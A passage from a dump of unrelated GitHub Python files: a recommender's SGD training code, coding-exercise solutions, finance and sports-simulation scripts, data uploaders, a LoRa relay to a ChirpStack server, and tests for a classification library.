rng.uniform(self.init_low, self.init_high, size=(trainset.n_items, self.n_factors))\n for epoch in range(self.n_epochs):\n print(\"Procesando epoch #\" + str(epoch))\n # Se ajustan los valores de la matriz el número de epochs definidos por parámetro\n for user, item, rating in trainset.all_ratings():\n # Se calcula el producto punto entre el vector\n # correspondiente al usuario e ítem actual en la iteración\n dot = np.dot(pu[user], qi[item])\n # Se calcula el estimado actual para\n # el rating del usuario al ítem a + c * K(w_u, h_i)\n estimate = self.kernel_a + self.kernel_c * dot\n for factor in range(self.n_factors):\n # Se calcula la derivada parcial con respecto a w_u,f\n pd_pu = (estimate - rating) * qi[item, factor] + self.reg * pu[user, factor]\n # Se calcula la derivada parcial con respecto a h_i,f\n pd_qi = (estimate - rating) * pu[user, factor] + self.reg * qi[item, factor]\n\n # Se actualiza el valor de w_u,f y h_i,f con non-negative restriction\n pu[user, factor] = max(0, pu[user, factor] - self.lr * pd_pu)\n qi[item, factor] = max(0, qi[item, factor] - self.lr * pd_qi)\n self.pu = pu\n self.qi = qi\n\n\n def estimate(self, user, item):\n \"\"\"Estima el rating que un usuario dará a un ítem\"\"\"\n known_user = self.trainset.knows_user(user)\n known_item = self.trainset.knows_item(item)\n est = self.trainset.global_mean\n if known_user and known_item:\n est = self.kernel_a + self.kernel_c * np.dot(self.qi[item], self.pu[user])\n else:\n raise PredictionImpossible(\"User and item are unknown.\")\n return est\n\n\n def user_update(self, user_id, item_id, rating):\n \"\"\"Actualiza el vector de un usuario al recibir la información de un rating nuevo\"\"\"\n # Se obtiene el usuario y el ítem del trainset\n user = self.get_user(user_id)\n item = self.get_item(item_id)\n # Se añade el nuevo rating al trainset\n self.add_rating(user, item, rating)\n # Se obtienen los ratings que ha dado el usuario hasta el momento\n user_ratings = self.trainset.ur[user]\n\n # El vector del usuario en la matriz de usuarios x factores se reinicializa\n rng = np.random.mtrand._rand\n pu_user = rng.uniform(self.init_low, self.init_high, size=(self.n_factors))\n for epoch in range(self.n_epochs):\n # Se ajustan del vector del usuario el número de epochs definidos por parámetro\n print(\"Procesando epoch #\" + str(epoch))\n for item_loop, rating_loop in user_ratings:\n # Se hace SGD por cada rating que el usuario ha dado\n # Se calcula el producto punto entre el vector\n # correspondiente al usuario e ítem actual en la iteración\n dot = np.dot(pu_user, self.qi[item_loop])\n # Se calcula el estimado actual para\n # el rating del usuario al ítem a + c * K(w_u, h_i)\n estimate = self.kernel_a + self.kernel_c * dot\n for factor in range(self.n_factors):\n # Se calcula la derivada parcial con respecto a w_u,f\n pd_pu = (estimate - rating_loop) * self.qi[item_loop, factor] + self.reg * pu_user[factor]\n # Se actualiza el valor de w_u,f con non-negative restriction\n pu_user[factor] = max(0, pu_user[factor] - self.lr * pd_pu)\n # Se actualiza el vector del usuario en la matriz\n self.pu[user] = pu_user\n\n\n def get_user(self, user_id):\n \"\"\"Obtiene el inner_id del usuario dado como parámetro\"\"\"\n try:\n # Se trata de buscar el inner_id del usuario en el trainset\n user = self.trainset.to_inner_uid(str(user_id))\n return user\n except ValueError:\n # Si el usuario no tiene inner_id se le asigna el que seguiría,\n # es decir, el número de usuarios ya en el trainset\n user = self.trainset.n_users\n # Se asigna al raw id el inner id correspondiente\n self.trainset._raw2inner_id_users[user_id] = user\n # Se aumenta el número de usuarios en el trainset\n self.trainset.n_users += 1\n # Se crea un vector para el usuario y se agrega a la matriz de usuarios x factores\n rng = np.random.mtrand._rand\n pu_user = rng.uniform(self.init_low, self.init_high, size=(self.n_factors))\n self.pu = np.vstack((self.pu, pu_user))\n return user\n\n\n def get_item(self, item_id):\n \"\"\"Obtiene el inner_id del ítem dado como parámetro\"\"\"\n try:\n # Se trata de buscar el inner_id del ítem en el trainset\n item = self.trainset.to_inner_iid(str(item_id))\n return item\n except ValueError:\n # Si el ítem no tiene inner_id se le asigna el que seguiría,\n # es decir, el número de ítems ya en el trainset\n item = self.trainset.n_items\n # Se asigna al raw id el inner id correspondiente\n self.trainset._raw2inner_id_items[item_id] = item\n # Se aumenta el número de ítems en el trainset\n self.trainset.n_items += 1\n # Se crea un vector para el ítem y se agrega a la matriz de ítems x factores\n rng = np.random.mtrand._rand\n qi_item = rng.uniform(self.init_low, self.init_high, size=(self.n_factors))\n self.qi = np.vstack((self.qi, qi_item))\n return item\n\n \n def add_rating(self, user, item, rating):\n \"\"\"Añade un nuevo rating de un usuario a un ítem al training set\"\"\"\n # Se añade el rating a la lista de ratings del usuario\n self.trainset.ur[user].append((item, rating))\n # Se añade el rating a la lista de ratings del ítem\n self.trainset.ir[item].append((user, rating))\n # Se aumenta la cantidad de ratings en 1\n self.trainset.n_ratings += 1\n","repo_name":"cfagudelo96/SistemasRecomendacionG1T3","sub_path":"rkmf_algorithm.py","file_name":"rkmf_algorithm.py","file_ext":"py","file_size_in_byte":9785,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20618291761","text":"\nmi_path = 'supermarket/Mi_6'\nsam_path = 'supermarket/Samsung_C5Pro'\nMNIST_ROOT = './mnist/'\n\nEPOCH = 50\nBATCH_SIZE = 1\nHIDDEN_SIZE = 64\nTIME_STEP = 10\nINPUT_SIZE = 3\nOUTPUT_SIZE = 2\nLR = 0.1\nCLA_COUNT = 100\n\n\ndef show_img(img, title):\n plt.imshow(img, cmap='gray')\n plt.title(title)\n plt.show()\n\n\n'''\nDOWNLOAD_MNIST = True\nMNIST_ROOT = './mnist/'\nif not(os.path.exists(MNIST_ROOT)) or not os.listdir(MNIST_ROOT):\n DOWNLOAD_MNIST = True\n\ntrain_data = torchvision.datasets.MNIST(\n root=MNIST_ROOT,\n train=True,\n transform=torchvision.transforms.ToTensor(),\n download=DOWNLOAD_MNIST\n)\n\ntest_data = torchvision.datasets.MNIST(root=MNIST_ROOT, train=False)\n\ntrain_loader = data.DataLoader(dataset=train_data, batch_size=BATCH_SIZE, shuffle=True)\n\nTEST_DATA_SIZE = 2000\ntest_x = torch.unsqueeze(test_data.test_data[:TEST_DATA_SIZE], dim=1).type(torch.FloatTensor)/255\ntest_y = test_data.test_labels[:TEST_DATA_SIZE]\n\n# steps = np.linspace(0, np.pi * 2, 100, dtype=np.float32) # 0 ~ 2*pi (6.28)\n# x_np = np.sin(steps)\n# y_np = np.cos(steps)\n# show the cos & sin\n# plt.plot(steps, x_np, 'b-', label='input (sin)')\n# plt.plot(steps, y_np, 'r-', label='target (cos)')\n# plt.legend(loc='best')\n# plt.show()\n# print(steps)\n\n\n\n # plotting\n # ylim_value = 1.2\n # x_steps = steps + np.ones(TIME_STEP) * TIME_STEP * (step % CLA_COUNT)\n # clear_flag = False\n # if step % CLA_COUNT == 0:\n # clear_flag = True\n # print(\"hehe\")\n # if clear_flag:\n # plt.cla()\n'''\n\n","repo_name":"asdiijj/Mag","sub_path":"params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39183878318","text":"import Functions as f\nimport statistics_SL as s\nimport season as se\nimport sql_queries as sqlq\n\n# Optimized\n\ndef main():\n while True:\n user_input = f.first_screen() # First screen alows the user to choose between actions\n function_dictionary = {1 :f.create_team, # Create a new team and write it to DB\n 2 :f.create_player, # Create a new player and write it to DB\n 3 :season_screen, # Start new season\n 4 :f.show_all_teams, # Shows all valid teams and players\n 5 :f.show_one_team, # Shows menu of all teams and then players of one team\n 6 :f.drop_player, # User can drop any player from any team\n 7 :f.sign_player, # User can sign any player from free agents to any team\n 8 :f.create_custom_player, # User can sign any player from free agents to any team\n 9 :f.inactivate_team, # User can inactivate team and release it's players to free agents\n 10:f.exit_app # Exits application\n }\n function_dictionary.get(user_input, lambda: None)() # Calls action that user added as input\n\n\ndef season_screen():\n\n start_new_season = True\n games_list = se.make_schedule(10)\n year = 2023\n season_round = 1\n\n if sqlq.check_team_count() != 10: # To start the season we need to have exactly 10 valid teams\n se.wrong_team_count()\n return\n\n if sqlq.check_player_count(): # To start the season each team needs to have 5 valid players\n se.show_teams_above()\n return\n\n if start_new_season: # If we need to start new game with clear DB, clear down Games and Player_scores\n f.reset_season()\n\n function_dictionary = {2:f.trade_players, # Trade players between teams\n 3:f.drop_player, # Drops player from team to free agents\n 4:f.sign_player, # Sign player from free agents to team\n 5:f.show_all_teams # Shows all teams and players\n }\n\n while True:\n\n if season_round == 19: # If 18 rounds are done, let's go to playoffs\n s.mvp(year) # Displays season MVP\n if year > 2023: s.mip(year) # Displays most improved player\n\n print(f\"\\n{year} playoffs!\")\n se.playoffs(year) # starts playoffs\n se.mvp_growth(year) # Increase Offence and Defence for MVP\n se.player_development() # Changes Offence and defence based on potential, potential based on age\n se.random_development() # Increases all stats by 10 for one random player\n se.draft(year) # Creates new players and starts draft\n season_round = 1\n year += 1\n start_new_season = False\n\n print(f\"\\n{year} season, round {season_round}:\")\n user_input = f.season_menu() # season screen alows the user to choose between actions\n\n if user_input == 1: # Simulates games of one round and displays results\n se.play_round(games_list[season_round-1], year) #\n season_round += 1 # \n\n elif user_input == 6: # break back to main screen\n break\n\n else:\n function_dictionary[user_input]() # Action from function dictionary\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n# Current To-Do list: \n\n# Test and fix draft\n# need to add validation after draft that all teams has only 5 players or change the logic to play 5 best players (This sounds better)\n# How to display historic results\n# Start a new game or continue previous one (new game would drop data in Games and Player_Score tables) - test start_new_season\n# Create an option to activate back team \n","repo_name":"KGrants/Simple-Games","sub_path":"SundayLeague/SundayLeague/SundayLeague.py","file_name":"SundayLeague.py","file_ext":"py","file_size_in_byte":4413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4361981542","text":"class Solution(object):\n # 执行时间为664ms的案例\n def ladderLength_1(self, beginWord, endWord, wordList):\n \"\"\"\n :type beginWord: str\n :type endWord: str\n :type wordList: List[str]\n :rtype: int\n \"\"\"\n distance, cur, visited, lookup = 0, [\n beginWord], set([beginWord]), set(wordList)\n\n while cur:\n next_queue = []\n\n for word in cur:\n if word == endWord:\n return distance + 1\n for i in range(len(word)):\n for j in 'abcdefghijklmnopqrstuvwxyz':\n candidate = word[:i] + j + word[i + 1:]\n if candidate not in visited and candidate in lookup:\n next_queue.append(candidate)\n visited.add(candidate)\n distance += 1\n cur = next_queue\n\n return 0\n # 执行时间为108ms的案例\n def ladderLength_2(self, beginWord, endWord, wordList):\n\n wordSet = set(wordList)\n headQ = set([beginWord])\n tailQ = set([endWord])\n step = 1\n\n if endWord not in wordSet:\n return 0\n else:\n wordSet.discard(endWord)\n\n while headQ:\n step += 1\n currSet = set()\n for word in headQ:\n for i in range(len(word)):\n p1 = word[:i]\n p2 = word[i + 1:]\n for c in \"abcdefghijklmnopqrstuvwxyz\":\n new = p1 + c + p2\n if new in tailQ:\n return step\n if new in wordSet:\n currSet.add(new)\n wordSet.remove(new)\n\n headQ = currSet\n if len(headQ) > len(tailQ):\n headQ, tailQ = tailQ, headQ\n\n return 0\n","repo_name":"haitwang-cloud/leetCode_Python","sub_path":"Word-Ladder.py","file_name":"Word-Ladder.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"8820796457","text":"def main():\n day = eval(input(\"Enter today's day: \"))\n elapsed = eval(input(\"Enter the number of days elapsed since today: \"))\n future = day + (elapsed % 7)\n if day == 0:\n day = 'Sunday'\n elif day == 1:\n day = 'Monday'\n elif day == 2:\n day = 'Tuesday'\n elif day == 3:\n day = 'Wednesday'\n elif day == 4:\n day = 'Thursday'\n elif day == 5:\n day = 'Friday'\n elif day == 6:\n day = 'Saturday'\n if future == 0:\n future = 'Sunday'\n elif future == 1:\n future = 'Monday'\n elif future == 2:\n future = 'Tuesday'\n elif future == 3:\n future = 'Wednesday'\n elif future == 4:\n future = 'Thursday'\n elif future == 5:\n future = 'Friday'\n elif future == 6:\n future = 'Saturday'\n\n print ('Today is', day, 'and the future day is', future)\nmain()\n","repo_name":"juanitotaveras/CS301_Intro_to_Programming","sub_path":"futuredate.py","file_name":"futuredate.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31313094337","text":"import sys, pdb\nsys.path.append(\"/home/ubuntu/workspace/python_for_finance\")\nsys.path.append(\"/usr/local/lib/python2.7/dist-packages\")\n# sys.path.append(\"/usr/local/lib/python3.4/dist-packages\")\n# import matplotlib as mpl\n# mpl.use('Agg')\n# import matplotlib.pyplot as plt\n\nfrom dx import *\nfrom utils.utils import *\n\nimport numpy as np\n# import pandas as pd\nimport datetime as dt\n\n\ndef euro_call_bounds(stock_px, strike, settle_dt, mat_dt, r, divs=0):\n delta_t = get_year_deltas([settle_dt, mat_dt])[-1]\n mx = stock_px\n mn = max(stock_px - divs - strike * np.exp((-1) * r * delta_t), 0)\n return (mx, mn)\n\n\ndef euro_put_bounds(stock_px, strike, settle_dt, mat_dt, r, divs=0):\n delta_t = get_year_deltas([settle_dt, mat_dt])[-1]\n mx = strike * np.exp((-1) * r * delta_t)\n mn = max(divs + strike * np.exp((-1) * r * delta_t) - stock_px, 0)\n return (mx, mn)\n \n\ndef amer_call_bounds(stock_px, strike, settle_dt, mat_dt, r, divs=0):\n delta_t = get_year_deltas([settle_dt, mat_dt])[-1]\n mx = stock_px\n mn = max(stock_px - strike * np.exp((-1) * r * delta_t), 0)\n return (mx, mn)\n \n\ndef amer_put_bounds(stock_px, strike, settle_dt, mat_dt, r, divs=0):\n mx = strike\n mn = max(strike * np.exp((-1) * r * delta_t) - stock_px, 0)\n return (mx, mn)\n\n\ndef put_call_parity(opt_px, under_px, strike, r, settle_dt, mat_dt, p_c='c', divs=0):\n delta_t = get_year_deltas([settle_dt, mat_dt])[-1]\n if p_c == 'c':\n return opt_px + under_px - divs - (strike * np.exp((-1) * r * delta_t))\n else:\n return opt_px + (strike * np.exp((-1) * r * delta_t)) + divs - under_px\n\n\nif __name__ == '__main__':\n # print(euro_call_bounds(20, 18, dt.datetime(2015,1,1), dt.datetime(2016,1,1), 0.1))\n # print(euro_put_bounds(37, 40, dt.datetime(2015,1,1), dt.datetime(2015,7,1), 0.05))\n print(put_call_parity(2.25, 31, 30, 0.10, dt.datetime(2015,1,1), dt.datetime(2015,4,1), 'c'))","repo_name":"mccarvik/python_for_finance","sub_path":"books/hull_examples/props_of_options.py","file_name":"props_of_options.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"71861658409","text":"import os\nimport sys\nimport logging\nimport random\nimport datetime\nimport json\n\nfrom logging.handlers import RotatingFileHandler\n\n\ndef get_logger():\n logs_folder_path = os.getenv('LOGS_FOLDER_PATH')\n app_name = os.getenv('APP_NAME')\n\n if not os.path.isdir(logs_folder_path):\n os.mkdir(logs_folder_path)\n log_file_path = logs_folder_path + '/' + app_name + '.log'\n if not os.path.isfile(log_file_path):\n log_file = open(log_file_path, \"a\")\n log_file.close()\n\n logger = logging.getLogger(app_name)\n logger.setLevel('DEBUG')\n\n log_format = logging.Formatter(\"%(asctime)s | %(name)s | %(levelname)s | %(message)s\")\n\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setFormatter(log_format)\n logger.addHandler(console_handler)\n\n file_handler = RotatingFileHandler(log_file_path, maxBytes=(1048576 * 5), backupCount=5)\n file_handler.setFormatter(log_format)\n logger.addHandler(file_handler)\n\n logger.info('logger created')\n logger.info('starting ' + app_name + '...')\n\n return logger\n\n\ndef get_day(logger):\n logger.info('getting day...')\n\n now = datetime.datetime.now()\n\n return now.day\n\n\ndef get_year(logger):\n logger.info('getting year...')\n\n now = datetime.datetime.now()\n\n return now.year\n\n\ndef get_aotd(logger, day, year):\n logger.info('getting album of the day...')\n\n json_folder = os.getenv('JSON_FOLDER')\n\n with open(json_folder + '/' + str(year) + '.json') as albums_json:\n data = json.load(albums_json)\n for album in data:\n if album['day'] == day:\n return album\n\n return None\n","repo_name":"gaizkadc/metal-december","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14780978354","text":"from polygon import RESTClient\nimport polygon\nfrom dotenv import load_dotenv\nimport os\nimport pandas as pd\nfrom tqdm import tqdm\n\nenv = load_dotenv('/Users/syyun/Dropbox (MIT)/efd/.env')\napi_key = os.getenv(\"POLYGON_APIKEY\")\nprint(api_key)\nclient = RESTClient(api_key=api_key)\n\nfrom octopus.db import PostgresqlManager\npm = PostgresqlManager(dotenv_path=\"/Users/syyun/Dropbox (MIT)/efd/.env\")\ndf = pm.execute_sql(fetchall=True, sql=\n \"\"\"\n with target as (\n select distinct sb.ticker, trans_date, vwap from senate_annual_4a sb\n inner join senate_annual sa on sa.report_type_url = sb.report_url\n left join price p on (p.ticker = sb.ticker and trans_date =p.\"date\")\n where vwap is null and sb.ticker is not null\n )\n select ticker, trans_date from target\n where (ticker, trans_date, vwap) not in (select ticker, date as trans_date, vwap from price p where vwap is null) \"\"\"\n )\nsql_insert = \"\"\"\nINSERT INTO price(ticker, date, vwap)\nVALUES(%s, %s, %s)\n\"\"\"\n\nticker = \"AAPL\"\ndate = \"2020-01-01\"\nfor ticker, date in tqdm(df): # name and ticker pairs\n # get price\n try:\n bars = client.get_aggs(ticker=ticker, multiplier=1, timespan=\"day\", from_=date, to=date)\n vwap = bars[0].vwap\n\n pm.execute_sql(\n sql=sql_insert,\n parameters=(\n ticker,\n date,\n vwap,\n ),\n commit=True,\n )\n except polygon.exceptions.NoResultsError as e:\n \n vwap = None\n pm.execute_sql(\n sql=sql_insert,\n parameters=(\n ticker,\n date,\n vwap,\n ),\n commit=True,\n )\n pass\n ","repo_name":"syyunn/efd","sub_path":"apis/plgn/price.py","file_name":"price.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37476446481","text":"def solution(participant, completion):\n participant_dict = dict(zip(participant, [0]*len(participant)))\n for name in participant:\n participant_dict[name] += 1\n \n for name in completion:\n participant_dict[name] -= 1\n \n for player, num in participant_dict.items():\n if num == 1:\n return player\n\n\"\"\"\n문제주소 : https://programmers.co.kr/learn/courses/30/lessons/42576\n시간 : 15분\n\n- 효율성 테스트가 중요헀던 문제로\n- list의 remove는 초과\n- set을 이용한 반복문 내 in 초과\n\n\n\n다른 사람 풀이 :\n========================================================================================\nCounter 이용\n\nimport collections\n\ndef solution(participant, completion):\n answer = collections.Counter(participant) - collections.Counter(completion)\n return list(answer.keys())[0]\n========================================================================================\nCounter 이용2\nfrom collections import Counter\ndef solution(participant, completion):\n\n inter = list((Counter(participant) - Counter(completion)).elements())\n\n return inter.pop()\n========================================================================================\n\n노트 :\n- https://dev.plusblog.co.kr/42 살펴보기\n- https://wiki.python.org/moin/TimeComplexity 살펴보기\n- 파이썬 Counter 찾아보기\n\"\"\"","repo_name":"Tao-Kim/study_algo","sub_path":"programmers/p8_42576_완주하지못한선수.py","file_name":"p8_42576_완주하지못한선수.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19157866552","text":"import time\nimport sqlite3 # python3 -m pip install sqlite3\nimport urllib3 # python3 -m pip install urllib3\n\nhttp = None\n\nkeys = {\n 'ldr': 'TBD',\n 'tmp': 'TBD',\n 'hum': 'TBD'\n}\n\ndef send(data):\n api_key = keys[data[0]]\n\n r = http.request(\n 'GET', \n 'https://api.thingspeak.com/update?api_key={}&field1={}'.format(api_key, data[1])\n )\n\n if r.status != 200:\n print('Some error sending data')\n\nif __name__ == '__main__':\n con = sqlite3.connect('sedu.db')\n cur = con.cursor()\n\n http = urllib3.PoolManager()\n\n try:\n while True:\n \n for row in cur.execute('SELECT id, value, time FROM sensors'):\n if row and row[0] != 'cks':\n print(row)\n send(row)\n con.execute('delete from sensors where id=\"{}\" and value={} and time=\"{}\"'.format(row[0],row[1], row[2]))\n\n con.commit()\n time.sleep(1)\n except(KeyboardInterrupt, e):\n print('Program stopped')\n con.close()\n\n \n \n","repo_name":"serrodcal-MII/SEDU","sub_path":"m8/thing_speak.py","file_name":"thing_speak.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24991710008","text":"from playwright.sync_api import Page, expect\nimport pytest\n\n\n@pytest.fixture()\ndef home_page(page: Page) -> Page:\n page.set_default_timeout(5000)\n page.goto(\"http://127.0.0.1:8000\", timeout=3000, wait_until=\"load\")\n return page\n\n\ndef test_example_is_working(home_page: Page):\n assert home_page.inner_text(\"h1\") == \"Organizations\"\n\n\ndef test_create_organization(home_page: Page):\n assert home_page.inner_text(\"#orgs\\.counter\") == \"0\"\n\n home_page.locator('[placeholder=\"Organization name\"]').fill(\"Henkel\")\n home_page.locator('[placeholder=\"Organization name\"]').press(\"Enter\")\n\n assert home_page.inner_text(\"#orgs\\.counter\") == \"1\"\n\n home_page.locator('[data-org_delete_name=\"Henkel\"]').click()\n\n expect(home_page.locator(\"#orgs\\.counter\")).to_have_text(\"0\")\n","repo_name":"talebisinan/fastapi-htmx","sub_path":"tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"337389258","text":"#!/usr/bin/env python3\n\nimport sys\nimport argparse\nfrom flask import Flask\nfrom flask import request\nfrom flask import Response\nimport pprint\nimport json\nimport binascii\n\nimport socket\nimport select\nimport time\nimport base64\n\nimport requests\n\napp = Flask(__name__)\napp.debug = True\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nprint('socket:', sock)\n\n@app.route('/TTN', methods=['POST'])\ndef get_from_chirpstack():\n import secret as secret\n\n #print (secret.server)\n #fromGW = request.get_json(force=True)\n #print (request.environ.get('REMOTE_PORT'))\n #pprint.pprint (fromGW)\n\n #downlink = None\n downlink = b\"downkink test test downkink test\"\n #if \"data\" in fromGW:\n #payload = base64.b64decode(fromGW[\"data\"])\n #downlink = forward_data(payload)\n #print (fromGW[\"fPort\"])\n\n if downlink != None:\n answer = {\n \"deviceQueueItem\": {\n\t\t \"data\": base64.b64encode(downlink).decode('utf-8'),\n \"fPort\": 3,\n }\n }\n pprint.pprint (answer)\n dev_eui = '1664a21ba532711d'\n #device = binascii.hexlify(base64.b64decode(fromGW[\"devEUI\"])).decode()\n downlink_url = secret.server+'/api/devices/'+dev_eui+'/queue'\n print (downlink_url)\n headers = {\n \"content-type\": \"application/json\",\n \"grpc-metadata-authorization\" : \"Bearer \"+ secret.key\n }\n print (headers)\n x = requests.post(downlink_url, data = json.dumps(answer), headers=headers)\n print(x)\n\n\n resp = Response(status=200)\n return resp\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-v\", \"--verbose\",\n action=\"store_true\",\n help=\"show uplink and downlink messages\")\n parser.add_argument('--http_port', default=9999,\n help=\"set http port for POST requests\")\n parser.add_argument('--forward_port', default=33033,\n help=\"port to forward packets\")\n parser.add_argument('--forward_address', default='127.0.0.1',\n help=\"IP address to forward packets\")\n\n args = parser.parse_args()\n verbose = args.verbose\n defPort = args.http_port\n forward_port = args.forward_port\n forward_address = args.forward_address\n\n app.run(host=\"0.0.0.0\", port=defPort)\n\nwhile True:\n get_from_chirpstack()\n time.sleep(30)\n","repo_name":"openschc/openschc","sub_path":"examples/scapy/relay_chirp.py","file_name":"relay_chirp.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"53"} +{"seq_id":"42354317632","text":"\"\"\"\nEjercicio 2.2.8\nEscribir un programa que pida al usuario un número entero y muestre por pantalla un triángulo\nrectángulo como el de más abajo.\n1\n3 1\n5 3 1\n7 5 3 1\n9 7 5 3 1\n\"\"\"\n\n\ndef piramNum (num: int):\n cont = 1\n while (num > 1):\n cont += 2\n num -=1\n for i in range(1, cont + 1, 2):\n print(\"\")\n for j in range(i, 0, -2):\n print(\"{j} \".format(j = j), end = \"\")\n return \"\"\n \n \ndef main():\n numer = int(input(\"Dime un número: \"))\n print(piramNum(numer))\n \n\nif __name__ == '__main__':\n main()","repo_name":"IES-Rafael-Alberti/1dawb-ejercicios-u2-ManuelAmayaOrozco","sub_path":"src/ejercicio2_18.py","file_name":"ejercicio2_18.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73248564007","text":"n = int(input())\nans = 0\nmaxi = 0\nfor i in range(1, n + 1):\n here = n\n stp = 0\n for j in range(i):\n check = (i - j) * (j + 1)\n if here - check > 0:\n stp += 1\n here -= check\n else:\n break\n if stp > maxi:\n maxi = stp\n ans = i\nif n == 1:\n print(1)\nelse:\n print(ans)\n","repo_name":"asalybek/ICT-Python-","sub_path":"final/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37179930425","text":"from numpy import zeros\n\nprint('[Generating data...]\\n')\n\nnsteps = round(200/dt)\nx = true_m0\nX = zeros(x.shape[0],nsteps)\nY = zeros(2,nsteps)\nT = zeros(1,nsteps)\n\nC = zeros(1,nsteps)\nt = 0\nfor k in range(nsteps):\n\tddt = dt / sim_iter\n\tfor i in range(sim_iter):\n\t\tA = reentry_df_dx(x, [ddt, b0, H0, Gm0, R0])\n\t\tx = reentry_f(x, [ddt, b0, H0, Gm0, R0])\n\n\tc = cond(A)\n\t\n\tt += dt\n\tC[k] = c\n\tT[k] = t","repo_name":"sursu/Bayesian-Filtering","sub_path":"EKFUKF_Py/demo/reentry_demo/reentry_cond.py","file_name":"reentry_cond.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"15442454731","text":"import pandas as pd\nfrom blitzml.tabular import Classification\nimport pytest\n\ntrain_df = pd.read_csv(\"auxiliary/datasets/banknote/train.csv\")\ntest_df = pd.read_csv(\"auxiliary/datasets/banknote/test.csv\")\n\n\ndef test_using_cross_validation():\n auto = Classification(\n train_df,\n test_df,\n algorithm='RF',\n cross_validation_k_folds = 5\n )\n auto.run()\n assert len(auto.metrics_dict['cross_validation_score']) == 5\n assert auto.metrics_dict['accuracy'] > 0 \n\ndef test_using_train_validation_curve():\n auto = Classification(\n train_df,\n test_df,\n algorithm='RF',\n )\n auto.run()\n assert auto.metrics_dict['accuracy'] > 0 \n assert len(auto.accuracy_history()['y1'])>0\n\n\ndef test_validation_percent_greater_than_90_percent_fail():\n with pytest.raises(AssertionError):\n auto = Classification(\n train_df,\n test_df,\n algorithm='RF',\n validation_percentage = 0.91\n )\n auto.run()\n\ndef test_different_feature_selection_modes():\n modes = [\"importance\", \"correlation\", \"none\"]\n for mode in modes:\n auto = Classification(\n train_df,\n test_df,\n algorithm='RF',\n feature_selection = mode\n )\n auto.run()\n assert auto.metrics_dict['accuracy'] > 0 \ndef test_train_dataset_without_target_column_fails():\n with pytest.raises(AssertionError):\n auto = Classification(\n train_df.drop('class', axis = 1),\n test_df,\n algorithm='RF'\n )\n auto.run()\n \ndef test_classifiers():\n classifier_list = [\"RF\",\"LDA\",\"SVC\",\"KNN\",\"GNB\",\"LR\",\"AB\",\"GB\",\"DT\",\"MLP\"]\n for classifier in classifier_list:\n auto = Classification(\n train_df,\n test_df,\n algorithm=classifier\n )\n auto.run()\n assert auto.metrics_dict['accuracy'] > 0\n\ndef test_using_auto_classifier():\n auto = Classification(\n train_df,\n test_df,\n algorithm='auto'\n )\n auto.run()\n assert auto.metrics_dict['accuracy'] > 0\n\ndef test_using_different_datasets():\n datasets = ['titanic', 'banknote', 'liqure quality']\n for dataset in datasets:\n train_df = pd.read_csv(f\"auxiliary/datasets/{dataset}/train.csv\")\n test_df = pd.read_csv(f\"auxiliary/datasets/{dataset}/test.csv\")\n auto = Classification(\n train_df,\n test_df,\n algorithm='RF'\n )\n auto.run()\n assert auto.metrics_dict['accuracy'] > 0\n\ndef test_using_custom_classifier():\n auto = Classification(\n train_df,\n test_df,\n algorithm='custom',\n class_name = \"classifier\",\n file_path = \"auxiliary/scripts/dummy.py\",\n )\n auto.run()\n assert auto.metrics_dict['accuracy'] > 0\n\ndef test_using_unsupported_average_type_fails():\n train_df = pd.read_csv(\"auxiliary/datasets/liqure quality/train.csv\")\n test_df = pd.read_csv(\"auxiliary/datasets/liqure quality/test.csv\")\n with pytest.raises(ValueError):\n auto = Classification(\n train_df,\n test_df,\n algorithm='RF',\n average_type = \"cheese\"\n )\n auto.run()\ndef test_using_wrong_custom_classifier_fails():\n with pytest.raises(KeyError):\n auto = Classification(\n train_df,\n test_df,\n algorithm='custom',\n class_name = \"worng-class-name\",\n file_path = \"auxiliary/scripts/dummy.py\",\n )\n auto.run()\n \ndef test_using_wrong_custom_classifier_file_path_fails():\n with pytest.raises(FileNotFoundError):\n auto = Classification(\n train_df,\n test_df,\n algorithm='custom',\n class_name = \"worng-class-name\",\n file_path = \"auxiliary/scripts/daaa.py\",\n )\n auto.run()\n\ndef test_using_unsupported_classifier_fails():\n with pytest.raises(AssertionError):\n auto = Classification(\n train_df,\n test_df,\n algorithm='Batman'\n )\n auto.run()\n\ndef test_using_empty_train_df_fails():\n with pytest.raises(AssertionError):\n train_df = 